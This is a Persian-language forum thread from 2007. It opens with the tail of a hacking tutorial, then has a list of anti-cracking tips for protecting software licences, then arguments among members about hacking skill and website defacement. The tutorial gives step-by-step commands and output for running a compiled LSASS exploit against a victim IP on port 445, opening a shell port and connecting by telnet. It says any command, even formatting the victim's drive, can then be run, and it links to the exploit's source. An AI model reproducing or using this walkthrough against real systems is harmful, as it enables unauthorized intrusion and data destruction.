2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
*
Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
*
Connecting to 217.0.0.1:445 ... OK
*
Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft Windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است
اميدوارم كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنيد براي اينكه همه بتوانند اين مطلب را استفاده كنند مجبور شدم كه خيلي جاها را ساده كنم ولي در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پی ببريد .
برای دريافت کد برنامه به زبان سی اينجا کليک کنيد ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
ادرس : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
اين وبلاگ براي كامپايل كدهاي سي كه در بالا مشاهده ميكنيد كمكي به شما عزيزان نمي تواند بكند متاسفيم از نزديكترين برنامه نويس سي كه در اطرافتان وجود دارد براي ايجاد فايل اجرايي از اين برنامه استفاده كنيد.
توجه به اين نكته ضروري است كه با اين روش شما هر اي پي را كه بخواهيد ميتوانيد به احتمال 80% هك كنيد استفاده از مطلب بالا فقط درصورتيكه هدف شما يادگيري و افزايش معلومات باشد
mazi_z_PSP
01-06-2007, 11:18
چگونه برنامه هایمان را در برابر کرک ها مقاوم تر سازیم ؟
1 – از اسامی با معنی مانند زیر استفاده نکنید :
function RegistrationOK: Boolean;
هر چقدر هم که کدی را که در این روال نوشته باشید متبحرانه و هوشمند باشد Cracker ها آن را در کمتر از 20 ثانیه در هم خواهند کوبید !!! خواه این را باور کنید یا نه .
راه دیگر اینست که در این روال کدهای برنامه را هم قرار دهید . ( یعنی بخشی از برنامه که ربطی هم به قفل ندارد ) در این حالت اگر Cracker این روال را غیر فعال کند برنامه هم درست کار نخواهد کرد .
2 – از پیغامهای nagscreens یا “Gotcha” استفاده نکنید :
این از اولین چیزهایی است که یک Cracker چک می کند . آنها هیچوقت برای تجزیه و تحلیل 300K برنامه شما وقت نخواهند گذاشت . بلکه به دنبال nag screens یا " مهلت استفاده مجانی تمام شده است " (Your evaluation time has expired!) خواهند گشت و از آنجا شروع به کار می کنند . ( در ادامه درباره این روش بیشتر بحث خواهیم کرد ) .
در بسیاری موارد آنها موفق می شوند که این صفحه را از resource فایل اجرایی بر خواهند داشت و برنامه بدون اینکه صفحات شما رانشان بدهد بدرستی کار خواهد کرد . اگر واقعاً به وجود اینچنین صفحاتی نیاز دارید آنها را در زمان اجرا و به طور دینامِک بسازید . و پیغام های مبنی بر اینکه برنامه رجیستر نشده است را در بخش معرفی (About) قرار دهید . بعضی از برنامه نویسان اعتقاد دارند که نمایش صفحات nag کاربران را از برنامه متنفر می کند و ... ( تو ایران از این خبرها نیست )
3 – از اسامی با معنی برای فایلها استفاده نکنید :
مانند License.dat . چرا ؟ شماره 1 را دوباره بخوانید .
4 – از روشهای نامتقارن رمزگذاری استفاده کنید :
تنها استقاده از اسامی غیر معمول در اسامی فایلها کافی نیست . بلکه ترکیب با این روش می تواند مدتها آنها را سر کار بگذارد !!!
5 – از تاخیر بلند استفاده کنید (Long Delay) :
بلافاصله به کاربر پیغام رجیستر ندهید و تا مدتی ( مثلاً یک یا دو روز ) آن را به تاخیر بیاندازید . ( Cracker ها از این موضوع نقرت دارند )
6 – از تاخیر کوتاه استفاده کنید : (Short Delay ) :
بعد از وارد کردن کلمه رمز یا هر روتین چک کننده یک یا دو ثانیه صبر کنید تا جلوی حمله های brute force گرفته شود . ساده است ولی عالی کار می کند . ( یا اینکه اگر کلمه رمز درست نبود مکث کنید )
7 – از checksum هم در dll و هم در exe استفاده کنید :
این روش چندان هم مطمئن نیست ولی کار Cracker را سخت تر می کند .
8 – برنامه تان را " خود ترمیمی " بنویسید :
این همان چیزی است که در تصحیح خطای مودم ها و هارد دیسکها استفاده می شود . این تکنولوژی قدمت زیادی دارد ولی کسی از آن در برنامه ها استفاده نمی کند ؟ فایده این روش در این است که اگر Cracker با یک decompiler کار کند لیستی را خواهد دید که دیگر معتبر نبوده و اجرا نمی شود .
9 – برای برنامه خودتان patch بنویسید :
کد خود را تغییر بدهید تا هر بار روش چک کردن و روالهایش تغییر کند .
10 – شماره های سریال را در جاهای غیر متعارف نگهداری کنید :
مثلاً در property یک فیلد بانک اطلاعاتی . حتما شنیده اید که : به آنها یک نام dll بدهید و در شاخه سیستم ویندوز نگهداری کنید . آنقدر گفته و شنیده شده که دیگر ارزشی ندارد .
11 – شماره های سریال را در چند جا نگهداری کنید :
( و تنها اگر اولی معتبر بود دومی را چک کنید )
12 – از کلمات معروف استفاده نکنید :
مانند این : متاسفانه .... (Sorry . But ) این هم جزو اولین چیزهایی است که چک می شود . کلمات را دینامیکی بسازید و یا آنها را به رمز درآورید .
13 – Cracker را غرق کنید :
با استفاده از فراخوانی (call) های ساختگی و رشته هایی که خوب رمز شده اند . دام افکنی لذت بخش است !!!
14 – از کلمات کیدی (reserve word) استفاده کنید :
وقتی رشته یا رمزی را کد می کنید سعی کنید مانند کلمات کلیدی در بیاید مانند : “73AF” یا GetWindowText . این باعث می شود که DisAssembler ها به اشتباه بیافتند .
15 – از حالت غیر فعال (disable) استفاده نکنید :
اگر در حالت نمایشی برنامه شما اطلاعات را ذخیره نمی کند گذاشتن یک منوی خاکستری برای آن کافی نیست . بلکه کد هم نباید در فایل exe شما موجود باشد . برای این منظور از روش ساده زیر می توانید استفاده کنید :
{$IFDEF trial}
... کاری انجام ندهید
{$ELSE}
... کارهای لازم برای کاربران اصلی و یا نسخه کامل
{$ENDIF}
16 – چند نسخه از برنامه تان ایجاد کنید :
{$IFDEF Anticrack_Method36}
.. روش تست قفل شماره 36
{$ENDIF}
با استفاده از روش فوق می توانید به سادگی چند نسخه از برنامه تان ایجاد کنید و هر روش را بسادگی فعال / غیر فعال کنید ( با استفاده از DEFINE کردن هر کدام از روشها در ابتدای برنامه قبل از کامپایل ) و این باعث می شود که crack یکی از نسخه های برنامه تان برای دیگری کار نکند و Cracker باید تمام نسخه ها را download و جداگانه crack کند یا اینکه اگر کاربر برنامه را از جایی متفاوت با cracker دریافت کند برنامه شما crack نخواهد شد !!! . و شما می توانید یک نسخه ویژه برای کاربران مجاز داشته باشید که کد رجیستر آن برای نسخه آزمایشی کار نخواهد کرد .
17 – برنامه تان را بسرعت به روز کنید (Update) :
این باعث می شود که کد برنامه تان تغییر کند و یک crack ساده برای نسخه بعدی شما کار نکند . و همینطور برنامه تان را در یک سایت عمومی برای دانلود نگذارید . این باعث می شود که کنترل بیشتری بر روی برنامه تان داشته باشید که از کجا دریافت می شود و همینطور سایر افراد نمی توانند نسخه قبلی برنامه تان را که crack روی آن کار می کند پیدا کنند . بله می توانند برنامه شما را نیز به همراه crack آن ارائه کنند ولی این باعث می شود که هارد دیسک آنها بسرعت پر شود .
18 – کدهای رجیستر موقت بسازید :
وقتی کاربری ادعای پرداخت پول کرد این کد را که تنها 15 تا 30 روز کار خواهد کرد برای او بفرستید . و تنها پس از اینکه مطمئن شدید پول به حسابتان واریز شده است کد اصلی و بدون محدودیت خود او را به او بدهید . بدین صورت Cracker ها هم به اشتباه می افتند . آنها گمان خواهند کرد که این کد اصلی است و آنرا در سایت خود قرار خواهند داد در حالیکه اینطور نیست و آنها بین دوستان خود احمق جلوه خواهند کرد . این موضوع به خصوص برای beta-tester ها مفید است .
19 – از متد قوی برای کد کردن استفاده کنید :
استفاده از یک xor ساده کافی نیست . از متدی استفاده کنید که به راحتی برگشت پذیر نباشد . ( اگر بتوانید متد برگشت ناپذیری را پیدا کنید چه بهتر و در ضمن متد برگشت ناپذیر به روش یا روشهایی گفته می شود که با داشتن حاصل عملیات و تمام متغیرها نتوان به عدد اولیه رسید . به عنوان مثال عبارت ax+b برگشت پذیر است زیرا با داشتن جواب 5 و مقادیر a=2 و b=1 می توان به مقدار x که همان 2 خواهد بود رسید ) و هر دو روش کد گذاری و از کد درآوردن را در برنامه تان نگذارید .
20 – چند نظر درباره قفلهای وابسته به سخت افزار :
بعضی از روشهای قفل گذاری شامل دریافت اطلاعاتی از سخت افزار کاربر مانند شماره سریال هارد دیسک یا checksum بایوس یا ... است . وقتی این عدد یکبار محاسبه شد آن را در جایی ذخیره کنید و سپس برنامه تان را اجرا کنید یا موارد غیر فعال را فعال کنید . یا اینکه می توانید این اطلاعات را کد گذاری کرده و به کاربر بگویید آنها را برای شما بفرستد . سپس کد فعال سازی را ساخته و برای کاربر ارسال کنید .
در ظاهر همه چیز خوب به نظر می رسد هر چند اگر مطالب قبلی را خوانده باشید می دانید که بهترین روش نیست ولی یک مشگل بزرگ در این روش نیاز به ارتباط دو طرفه بین شما و کاربران نهایی است که در مورد پروژه های بزرگ اصلا روش کارآمدی نیست .
هر بار که کاربر هارد دیسک خود را عوض می کند یا تغییری در سخت افزار خود می دهد و یا حتی هنگامیکه کامپیوتر جدیدی می خرد باید کد فعال سازی جدیدی از شما در خواست کند و اگر برنامه را چند ماه قبل خریده باشد ممکن است مدام در email خود نامه هایی با مضمون " چرا برنامه تان کار نمی کند؟ " را دریافت کنید که منجر به عدم اطمینان کاربرانتان خواهد شد . پس پیش از استفاده از این روش در مورد این موارد خوب قکر کنید . ( این روش برای برنامه های ایرانی به نظر من بهترین روش است بخصوص اگر از شماره سریال هارد استفاده شود همانطور که من هم 2 سالی هست که از این روش استفاده می کنم و برای مورد آخر نیز می توانید این موضوع را در بخش about برنامه تان ذکر کنید ) .
21 – و در نهایت وقت زیادی برای قفل گذاری برنامه هایتان نگذارید :
به راستی قفل ها چقدر ارزش دارند ؟ آیا بهتر نیست زمانی را که برای بهبود قفل خود صرف می کنید برای افزایش کارآیی برنامه تان بگذارید ؟ مشگل شکسته شدن قفل برنامه تان چه ارزشی خواهد داشت وقتی کسی از آن استفاده نکند ؟ یا بدرد کسی نخورد ؟ فکر نکنید کار شما بهترین در دنیا است
mazi_z_PSP
01-06-2007, 22:54
مقاله ها خوب بود؟ خوب اگه خوب بود يکم ديگه صبر کنين تا يه عالمه آموزش توپ براتون بزارم. به اميد سر بلنديه ایران
double_n
03-06-2007, 01:44
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و هکینگ باید یکم تیز باشی ؟ میدونی اینا دیگه کاربرد نداره ؟ میدونی باید بشینی برنامه های سرور ها رو آنالیز کنی و یه باگی از اونا پیدا کنی؟ بلدی برای یه باگ اوور فلو یا همون سرریز بافر توی لینوکس با زبان پرل ایکسپلوییت لوکال بنویسی ؟به کل از کرنل لینوکس یا هسته ی ویندوز چی می دونی؟ سیستم عامل چطوری میاد بالا؟ چطور می شه وقتی تو ویندوز هایپر نت می کنی بعد سیستمت رو روشن می کنی همه ی پنجره ها تو همون حالت قبل از هایپر نت هستن؟
می دونی الان دزدی اطلاعات خیلی مهمتر از هک های دیگه شده می دونی چرا گیر دادیم به سایت شرکت هایی که کد فعال سازی نرم افزار هاشون رو از طریق سایتشون میدن به کاربر؟
شما کجایی و هکر ها و امنیت کار های امروزی کجان!! شما هنوز موندی هکر کیه یکیم میاد رو یه سرور روزی 2 یا 3 بار سرک می کشه ببینم فلان دوست پرشین تولزیمون برنامه ای نوشته و نمونه ای از برنامش رو سایت گذاشته مثلا فالان برنامه ی پخش موزیک آنلانش رو کامل کرده ؟ یا فلان سایت سورس برنامه ی مدیریت دانشگاه تهران رو گذاشته رو سایتش و 4 مگ سورسه باحال توی وی بی !!!!
نمی خوام بگم شما چیزی از امیت سرت نمی شه ولی باید بگم این چیزایی که شما می گی رو همه الان می دونن نیازی به دوباره گویی نیست (تجربه را تجربه کردن خطاست : : منی که می دونم کرنل 2.6.9 (اونزمان که گیره این چیزا بودم اینجوری که می گم بود) با اون ایکپلوییت که دسترسی رو به حد آخر (به قول ایمان به اون حد آخر مستی و نعشگی) یعنی روت میرسونه بخوام روت کنم سرور کرش می کنه و این مساله رو دیدم نباید این کار رو رو یه سرور دیگه انجام بدم).
حالا اینم بگم بدون دوست من بنده یه 8 ماهی می شه بدون سر و صدا هم تیمم که دیفیس هاش نشون می داد که تیم هشتم تو ایرانه رو جمع کردم و از بحث امنیت و هکینگ کناره گیری کردم و رو آوردم به مبحث امنیت نرم افزار و کرکینگ حالا همه ی اینا به کنار این نکته رو بدون هرچی می دونی بزار بمونه واسه خودت آموزش اینجور چیزا حرامه همین وبس.
از دست منم ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی
ممنون دوست عزیز، سوالاتتون نکات بسیار عالی در خودش جای داده و به بعضی از سوالاتی که داشتم و همینطور سوالات خیلی ها که فکر می کنند هکر هستند و غرور بهشون اجازه پرسیدن نمیده با سوالات مناسبی جواب داده شده، امیدوارم همیشه موفق باشی.:10: :11:
اين يعني چي؟من كه پاك گيج شدم
راستي اگه كسي گفت چرا ما ايراني ها فقط بلديم تكست بزنيم بدون تصوير و توضيح بيشتر يك جايزه داره
جایزه اش چیه؟ من میدونم!!!!! ولی بیخیال بشی به نظرم بهتره :46:
موفق و سربلند باشید.
__Genius__
03-06-2007, 02:16
ممنون دوست عزیز، سوالاتتون نکات بسیار عالی در خودش جای داده و به بعضی از سوالاتی که داشتم و همینطور سوالات خیلی ها که فکر می کنند هکر هستند و غرور بهشون اجازه پرسیدن نمیده با سوالات مناسبی جواب داده شده، امیدوارم همیشه موفق باشی.:10: :11:
جایزه اش چیه؟ من میدونم!!!!! ولی بیخیال بشی به نظرم بهتره :46:
موفق و سربلند باشید.
اتفاقا شما اشتباه گرفتین ...
چهار تا آدم به قول اون دوستمون که میگه مثل ایمان ( im4n ) مدیر امپرور که پیدا میشه هک توی کشورمون میشه بچه بازی ...
یاد گرفتن فقط دیفیس کنن ...
چی بگم والا ... حرف که زیاد هست ولی بیخیال ...
تا وقتی که به هک و امنیت دید درستی نداشته باشیم هیچی نمیشیم .
شمایی که ادعا میکنی شل کدینگ بلدی .... لطف کن باگ مربوط به ویندوز ani رو برام تحلیل کن ...
double_n
03-06-2007, 14:06
شمایی که ادعا میکنی شل کدینگ بلدی .... لطف کن باگ مربوط به ویندوز ani رو برام تحلیل کن ...
من بگم؟ یا اون دوست دیگه؟:19:
mazi_z_PSP
06-06-2007, 18:42
من بگم؟ یا اون دوست دیگه؟:19:
شما بهتره خودت و با اون دوست ديگت هيچی نگی. بشين و تماشا کن. اجازه نميدم این تاپيک رو به حرف های باطل و کل کل بکشونی. نميخوای بورو با همون دوستات هک کن . تا شايد کمی بزرگ شی. معروف شی. و .... شی . فکر ميکونی خيلی بزرگی؟ خوب اگر اینطوره اینجا جای بزرگ ها نيست.
:2: :21:
double_n
07-06-2007, 01:14
ببین دادا
من اصلا نمیگم که هکرم! نه نیستم و معلومه هم نیستم.
ولی عادت ندارم مطالبی که خوندم دوباره بخونم.
پس خوش باش با مطالب قدیمی دیگران.
موقعی که من عضو اینجا بودم.........
این مطالب تا حالا 3-4 بار توی انجمنها قرار داده شده
جناب جنیوس هم من رو میشناسه و میدونه که هکر نیستم.
تا شايد کمی بزرگ شی. معروف شی. و .... شی . فکر ميکونی خيلی بزرگی؟ خوب اگر اینطوره اینجا جای بزرگ ها نيست.
من نه هکرم و نه بزرگ، ولی اگه میخوای بزرگ بشی و همینطور کوچول نمونی، باید دست بزرگترت رو بگیری باهاش بری ددری تا یاد بگیری راه رفتن رو. از این ساده تر هم نمیشد بگم
نميخوای بورو با همون دوستات هک کن
مشکل ما ایرانی ها اینه که روز دومی که کامپیوتر می خریم، میریم سراغ خرابکاری یاد گرفتن، در صورتی که اصولش رو یاد نگرفتیم، جالب اینجاست مطالبی هم که یادگرفتیم اونم دست و پا شکسته روز سوم و چهارم میایم به دیگران یاد بدیم.
اینطوریه ملت فکر می کنن هکرها جادوگرند یا جنایتکارند و یا باید خوی جنایتکارانه داشته باشند.
اینطور نیست و کاملا در اشتباهی
شما بهتره خودت و با اون دوست ديگت هيچی نگی. بشين و تماشا کن.
خیلی وقته دارم تماشا می کنم اینطور مطالب رو و میدونم که این تاپیک به هیچ جا نمیرسه... مگر اینکه فکری به حالش بکنید...
اجازه نميدم این تاپيک رو به حرف های باطل و کل کل بکشونی.
اگه یه شخص دیگه بیاد و پستهای من رو بخونه کاملا معلومه که قصد کل کل نداشتم و فقط منظورم این بوده که کیفیت پستهات رو ببری بالا بهتره تا کمیتشون رو .
تا شايد کمی بزرگ شی. معروف شی. و .... شی
به منش انسان معلومه که چه رفتارهایی داره و هدفش ار رفتارهاش چیه، پس لازم نیست به امثال تو بگم.
خوش باش، در پهنه وسیع روزگاری که علمی نامتناهی دارد.
و من و تو قطره ای بیش نیستیم!!!
موفق و سربلند باشید.
Payman_62
07-06-2007, 02:17
سلام.
دوستان عزیز لطفا بحث نکنید.
double_n قبول دارم مطالب قدیمیه. قبلا هم به mazi_z_MCSD گفته بودم سعی کنه مطالب به روز بذاره. mazi_z_MCSD بچه ها حق دارن. هر چی پیدا میکنی کپی پیست میکنی. خیلی بی نظم و ترتیب. از هک میپری به کرک. از کرک میپری به امنیت ویندوز و ... . فونت ها و سایزهایی هم که استفاده میکنی اصلا مناسب نیستن.
بازم میگم سعی کن مطالب به روز و جدید قرار بدی. مطالب رو هم دسته بندی کن و با نظم پیش برو. فونت و سایز رو هم تنظیم کن.
__Genius__ با نظرت در مورد ایمان موافقم. خودش یه بار گفت دنبال شهرته. اینه که نشسته و 24 ساعت سایت دیفیس میکنه.
mazi_z_PSP
07-06-2007, 09:49
رو چشم عزيزان. البته این رو هم بگم من که ADSL ندارم که بتونم به طور کامل از وقتم از اینترنت استفاده کنم. برای همين کمی مطالب در هم و برهمه. معذرت.از این مطالب جديد تر ندارم. اما يک پی دی اف دارم که البته قبلن تو اینجمن ها لينک برای دانلودش گزاشته شده.اما ميخوام برای کسايی که نتونستن و يا نديدن که دانلود کنن مطالبش رو فصل به فصل بزارم.
mazi_z_PSP
07-06-2007, 09:51
خوش باش، در پهنه وسیع روزگاری که علمی نامتناهی دارد.
و من و تو قطره ای بیش نیستیم!!!
موفق و سربلند باشید.
از این حرفت خيلی خوشم آمد. در کل ممنون.
__Genius__
13-06-2007, 03:25
اوه اوه .... اینجا رو ببین چه خبر شده ....:31:
نه دوست من ... من با شما نبودم .. من با اون آقایی هستم که اینجا سنگ ایمان خان رو به سینه میزنن و ادعای امنیت میکنن ....
من اصولا آدمی نیستم که ادعا داشته باشم و یه زمانی ادعا داشتم ولی ترک کردم ...
ولی بهتره آدم از خودش مایه بذاره تا دیگران ;)
کاشکی از یه فرد با سواد مایه میذاشتن ...
متاسفانه تیمهایی همچون .. آشیانه .... امپرور .... دلتا و اینها مبحث امنیت رو توی ایران به خرابی کشوندن ...
از طرف دیگه نگاه کنین هر چند من دیگه توی این تیمها عضو نیستم ولی نگاه کنین ... تیمهایی مثل شبگرد ... سیمرغ هر اسمی داشته باشن خدا رو شکر دیفیسر نیستن .
:)
ولی حتی تیمهایی مثل ihs .... که عزیزان خوبی توش عضو هستن با انجام برخی از دیفیسهاشون جامعه امنیت رو به طرف خرابی میکشونن ....
حرفی ندارم و فقط میتونم بگم 90% عزیزان دیفیسر که با اسم هکر میان جلو و کلمه مقدس هکر رو خراب میکنن توی خیلی از مسائل ساده هنوز گیر هستن :46::13:
اینو حاضرم به صورت real time به دوستان ثابت کنم .
امیدوارم اینطور حرف زدن من رو دلیل بر حسادت یا بی احترامی نذارین .
به امید ایرانی امن ...
:10:
کیه داره شل کد می نویسه ؟!!!!!
بیا یه برنامه بدم بافر اوور فلو داره (خودم هم باگش رو گفتم) آنالیز کن بگو کجاش باگ داره نیازی به شل کد نویسی نیست ببینیم چند چیا بلدی شاید بنده و بعضی از دوستان بخوان شاگرد خصوصیتون بشن !
راستی دوست دبیانی داری به بعضی ها توهین می کنی دوستانی مثل ایمان و دارک و پایتون و سینا و کاوه و مجید و شاهین و و و و و
تو خودت مطمئن باش اینا اینقدارام که تو فکر می کنی بی سواد نیستن
چقدر با ایمان حرف زدی ( قسمت بیستر علم این دوستان رو می شه از طریق گوگل به دست آورد ولی تا وقتی فکر به دست آوردن نباشی .... (شاید شما چیزی می دونی اینجور هرف میزنی ولی منی که هیچی نمی دونم نظرم اینه) ) چیا ازش پرسیدی در مورد چی پرسیدی بلد نبود ؟؟؟؟
بیخیال این بحث ها این دوست شل کد نویسمون بلده یه Gentoo نصب کنه ؟ !! اصلاً بلدی بدون GUI فدورا رو با اترنت به یه Man وصل کنی که بیاد نت ؟ نه این رو هم نخواستم بلدی بدون GUI لینوکس و Lan کنی (به لن وصل کنی؟!) بلدی بین لینوکس و ویندوز فایل شیر کنی (مبتدی دیگه )
خیلی پیشرفته هم باشی یه توضیح از لایه های کرنل لینوکس بده یا امنیتش رو با یه ورژن پایین ترش مقایسه کن!
بابا بیخیال هک چیه امنیت کیلویی چنده ؟؟؟!!!
طرف توی هاستینگ کنترلر باگ پیدا کرده برای اس کیو ال اینجکشن هزار تا مقاله داده هزار تا تو ضیح داده دیروز سربازیش تموم شده میگم می خوای چیکار کنی ؟! میگی هیچی هرکاری هم بکنم طرف Network و Security و Hacking و Bug و Shell و ... نمیام آخر عاقبت نداره از اینا باید عبرت گرفت!!
__Genius__
13-06-2007, 04:30
دوست عزیز چقدر با اطمینان حرف میزنی ؟!:20:
در همین حد بدونی که من یه باگ از نوع (DoS (Denial Of Service توی Internet Explorer نسخه 6.x.x پیدا کردم فکر میکنم کافی باشه .
من به هیچ عزیزی اینجا بی احترامی نکردم و هر حرفی هم میزنم عین حقیقت هست .
تمام دوستانی که نام بردی رو میشناسم و اینم بدونی که توی سایت bugtraq.ir فعالیت میکنم بد نیست . اونجا با مجید ادمین Ihs همون nt دوست هستم .
نیازی به این صحبتها نیست دوست من . اگه شما نصب کردن Gentoo رو سخت میدونین جای تاسف داره :13:
دوست من تا حالا هیچ وقت کار کردی با سیستم های BSD حرفه ای کار کنی !؟
من کاری ندارم شما چی کار میکنی ... چی بلدی و اصلا علاقه ای به دونستن این چیزا ندارم .:46:
ولی میتونم بهت بگم اگه شما نصب کردن Gentoo را سخت میدونی پس محاله بتونین OpenBSD نصب کنین ; )
اگه شما به تقلید از کاوه رفتین سراغ Gentoo باید بگم از خودتون نظری ندارین ...
لینوکسهای فوق العاده stable تری از اون داریم ... از جمله دبیان که از لحاظ امنیت زبان زد هستش و همچنین redhat
بد نیست بدونی من تمام تمرینات اسکپلویت نویسی رو روی کرنلهای 2.6.x.x.x. انجام میدم ; )
پس دوست خوب نیازی نیست از من سوال بپرسی ... سوال پرسیدن چیزی رو مشخص نمیکنه . سعی کن از خودت output داشته باشی .
با تفاسیری که از شما شنیدم در مورد بزرگان امنیت ایران فقط میتونم بگم شما هیچ کدوم از امنیت کاران حرفه ای ایران رو نمیشناسین ; )
من دو تا از دوستان رو فوق العاده دیدم توی مبحث امنیت .... یکی از دوستان با نام Cephexin و دیگر دوستمون Elite .
جالب اینکه بدونی من با هیچ کدوم از این دوستان ارتباط نزدیکی ندارم و فقط در حد میل با هم ارتباط داریم :20:
ولی کافیه همین دو تا اسم رو توی google سرچ کنی از این دو عزیز اطلاعاتی براتون میاد که مختون سوت میکشه .
در مورد شاهین هم اصلا صحبتی ندارم همون vampire .... چون تکلیف ایشون دیگه مشخص شده هست و فکر میکنم به اکثر دوستان دیگه ثابت شده سواد ایشون چقدر هست .... تعجب از اینکه چرا شما متوجه نشدین .
:27:
به هر حال سعی میکنم ادعایی در هیچ موقعی نداشته باشم .
و سعی میکنم با راهنمایی دوستان عزیزی که واقعا به من کمک میکنن به جای که دوست دارم برسم .
اما در مورد صحبت آخرتون ... شما به این مباحث علاقه ای ندارین ... ولی من خیلی علاقه مندم و سعی میکنم راه درست رو پیش بگیرم که حرف شما رو نزم که میگین " این کارها آخر عاقبت نداره "
من خیلی محترمانه حرف زدم ولی شما ظاهرا توپ پری دارین ... دوست ندارم صحبتهای من باعث بشه شما خدایی نکرده اخطاری دریافت کنین .
موفق باشین
به امید ایرانی امن ....
mazi_z_PSP
13-06-2007, 11:41
خوب ديگه دوستان اینجا جای این حرفا نيست.بهتره زود تر تمام بشه. يه مدت امتحان داشتم الان هم تمام شد بيشتر وقت دارم بيام . بنابر این ادامه مطالب رو ميزارم.شما هم خواهش ميکنم مطلب بزارين.و به من کمک کنين.
mazi_z_PSP
03-07-2007, 22:49
سلام دوستان.يه مدت هست نميتونم مقاله بزارم.دارم يه پروژه رو درست ميکنم.(شايد هک این سايت!!!) يکم دست به کار بشيد.کجا رفتن اونايی که کل کل ميکردن؟
Genius این elite رو خیلی خیلی خوب می شناسم از اون شبگردی های دوران قدیم بود که بکل فتوکپی نداره
بنده هم نخواستم اینجا کل را بندازم به کل از کل خوشم نمیاد دیدم این بنده خدا رو بستی به توپ گفتم یکم ترفش رو بگیرم !
راستی OpenBSd رو هم با تلاش زیاد نصب کردم قبل اون PC کار می کردم (توی دوران جوونی که حس امنیت توی رگامون بود) خیلی جالب تشریف داره بعد ها سره یه سرور مجبور شدم برم یه چیزایی از این Open و Free یاد بگیرم!
همیشه ی خدا هم با این Gentoo مشکل دارم و همیشه برای راحتی کار Pentoo رو نصب می کنم (یه آموزش کوچلو برا نصبش کنارش هست با اون خیلی راهت و با تمام اسکنر ها و .... نصب می شه)( دیگه فکر نکنم هاردم رنگی از پارتیشن های Linux ای به خودش ببینه)
راستی اون طرفی هم که آخر پست قبلی بحثش بود موش موشیه شبگرده اگه یکم فکر کنی و اون زمونا دسترسی به اون پایین پایین ها داشته بودی (اینجور که نشون می ده از اون کشته مرده هاشی مثل خودم) که حتماً داشتی میفهمی کیه ! خلاصه نه این انجمن جاشه نه به کل آخر عاقبت داره
راستی این دوستی که اینجا مقاله می زاری (صاحب خونه ) :
اگه خیلی می خوای به این دوستان خدمت کنی یه مقاله درمورد (عنوانش یه همچین چیزیه) "استفاده از OllyDB برای کشف حفره های امنیتی نرم افزار ها " رو پیدا کن و ترجمه بنما بزار همه استفاده کنن یه جا دیگه هم یه مقاله دیدم با Olly یه باگ اوور فلو رو کفش می کرد (فکر کنم توی arteam بود ) اینا بهتر از اون مطالبی می شن که شما داری بار این ملت می کنی ؛ یه چند تامقاله هم مال این شاهین و حسام هستن که فکر کنم به درد اینجا می خورن بگرد پیدا کن بزار مردم استفاده کنن
راستی __Genius__ این حسام هم کشیده کنار فکر کنم چند وقتیه میبینم داره کرک ریلیز می کنه Mfox هم یه 9 ماهی می شه نمیاد همه دارن یه جورایی می کشن کنار شمام آغازت یه پایانی داره یادش بخیر اون زمونا !!!!! (دیگه اینجا پست نمی دم خواستین چیزی درمورد اینجا یا خودم بگین PM کنین)
delta-pt
06-08-2007, 22:17
لطفآ منبع را بگید آخه خیلی تابلو است میتونید به تاپیکهای شبه سر بزنید اونجا دروس تخصصی تری درمورد هک است
mazi_z_PSP
08-08-2007, 21:37
ببخشيد دوست عزيز از اینکه منبع رو ننوشتم. چون مطالب از سايت های مختلف گلچين شده بود وقت نداشتم بنويسم.
ای بابا ما ایرانی ها ارزش این حرفا رو نداريم که دوستانه عزيز!!!!!
vBulletin , Copyright ©2000-2024, Jelsoft Enterprises Ltd.